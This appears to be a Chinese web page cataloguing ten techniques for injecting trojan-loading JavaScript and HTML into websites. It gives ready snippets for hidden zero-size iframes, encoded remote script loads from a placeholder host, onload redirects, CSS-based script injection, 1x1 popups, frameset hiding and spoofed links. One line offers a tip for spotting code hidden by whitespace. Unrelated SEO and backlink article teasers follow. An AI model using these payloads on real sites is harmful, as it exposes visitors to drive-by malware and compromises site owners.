网站javascipt挂马10种方法分析

iframe src=地址 width=0 height=0></iframe>

其中“地址”处可以输入恶意网站链接等

二:js文件挂马

只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀

四:body挂马

<body onload="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css教程中挂马

body {
background-image: url('网页特效:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

这种方式比较狠,也比较难发现。

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

时间: 2024-10-29 23:30:47

网站javascipt挂马10种方法分析的相关文章

对于网站快速提升排名10种方法分析

在耽误近一年时间的情况下,痛定思痛,决定自己动手做公司网站的SEO,具体过程如下: 1.买了几本专门SEO方面的书本,啃了两个星期,经常上比如www.111cn.net 和seo教程why之类的论坛,潜水学习了一段时间; 2.通过学习,发现公司这个网站存在很多的问题,根本没有考虑后续的网络营销,更谈不上什么SEO规划了.因为是属于公司业务性网站,不想对其整体重新制作.于是决定只对其局部重新调整,使其更加符合用户体验与网络营销的需求,包括调整业务分类.根据业务分类重新布局关键词.局部调整框架等;

网站运营:增加网站反向链接的10种方法

链接|网站运营 增加网站反向链接的10种方法 在SEO工作中,网站优化完之后,最重要的工作就是增加反向链接了.如何增加反向链接呢?这是很多站长头疼的问题,在这里和大家分享10种增加反向链接的方法: 方法1.将网站提交道DMOZ目录.yahoo目录.ODP目录一个一些专业目录网站: 方法2.到交换链接的BBS发布友情链接交换信息, 比如到: http://www.seo.org.cn/forum/    方法3.与行业协会或商业机构联系.这些非营利性的网站的链接权重一般都比较高,所以与这些网站进行

增加网站反向链接的10种方法!

链接 在SEO工作中,网站优化完之后,最重要的工作就是增加反向链接了.如何增加反向链接呢?这是很多站长头疼的问题,王通在这里和大家分享10种增加反向链接的方法: 方法1.将网站提交道DMOZ目录.yahoo目录.ODP目录一个一些专业目录网站; 方法2.到交换链接的BBS发布友情链接交换信息 方法3.与行业协会或商业机构联系.这些非营利性的网站的链接权重一般都比较高,所以与这些网站进行链接交换也是非常好的一种手段; 方法4.寻找竞争对手网站的反向链接,主动与这些网站进行链接交换:向超越竞争对手,

红兵:网站外链的10种方法

今天我们来说说网站增加外链的方式方法.给出我认为比较好的方法供大家参考,网站外链建设是seo的核心之一,掌握的一个好的方法不仅可以稳定快速的提高网站排名,而且最主要的是节省经历和时间,打个比方,A seoer每天以论坛留言的方法增加外链,每天5个小时,而B seoer利用软文的方法每天只要1个小时,而无论在外链的数量和质量上到远远高于A seoer,当然前提是软文的质量高!所以掌握一种好的增加外链方法是非常重要的.下面就介绍我总结的10中增加外链的方法,供大家参考. 1,论坛签名,灌水是比较累的

网站有效的推广10种方法

1.网站推广工作本身就是一个系统的工程,不能是东边打一枪西边放一炮; 2.再个,什么叫推广,为什么"推"字是个提手旁,而不是口子旁,要动手去执行的,要自己亲自去做的,这就是为什么你在网上看了那么多的别人成功的经验而自己还是做不出成绩的原因,要动手,要执行!"时间是检验真理唯一的标准"抗战时期我们的领袖们都提出了这个观点; 3.在做推广的过程中一定要注意细节,一天一种推广方法漏掉2个细节,一年10种推广方法漏掉:365*10*2=7300个细节,你觉得这些不重要吗?

网站被挂马怎么办:排名恢复方法

中介交易 SEO诊断 淘宝客 云主机 技术大厅 网站被攻击和挂马是导致网站排名消失的原因之一,也是最常见的原因.近日,服务器老是被攻击导致网站被挂马,网站排名也随之消失.注意不是下降,是直接从首页掉到100名以后.在这里跟大家分享一下被挂马原因.解决方法和注意事项. 网站被挂马原因解析 网站被挂马一般来说有两方面原因: 1.服务器出现漏洞,被攻击. 2.网站程序存在缺陷被攻击. 一个服务器上可以有上百个甚至上千个网站,所以服务器出问题的概率要远远小于网站.大多数网站被挂马都是网站程序缺陷造成的,

批量处理网站文件挂马方法与程序

批量处理网站文件挂马方法与程序 很多网站因为种路原因被挂上了木马,我们来讲讲几种比较快的去除网页木马的方法吧, 第一种:用dw直接连接到服务器上查找-替换就OK了. 第二种:在线替换就是把下面的代码保存成一个asp文件,执行就OK了. <% Server.ScriptTimeout="600" call getfile(server.mappath(".\"))                   sub   getfile(c_path)          

网站被挂马,请朋友们帮忙分析一下漏洞.已上传IIS日志

问题描述 网站被挂马,请朋友们帮忙分析一下漏洞.现在我把IIS日志发出来,希望懂的朋友们,尽量帮忙看看,鄙人不甚感激.IIS日志#Software:MicrosoftInternetInformationServices6.0#Version:1.0#Date:2012-10-1510:11:04#Fields:datetimes-sitenames-ipcs-methodcs-uri-stemcs-uri-querys-portcs-usernamec-ipcs(User-Agent)sc-s

分享站长快速检测网站是否被挂马的三方法

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 网站被挂马或者被挂暗链说明网站的管理权限已落入他人之手,而且网站被挂马往往来给网站带来不可估量的负面影响,最常见的就是网站用户体验变形.网站被降权甚至是被K,而对于网站被马之后,很多站长都不能及时的发现并处理,导致网站出现状况后才有所感概.那么站长应该如何去防范这个网站最大的杀手呢?站长如何去检查自己的网站是否被挂马了呢?今天笔者以亲身经历来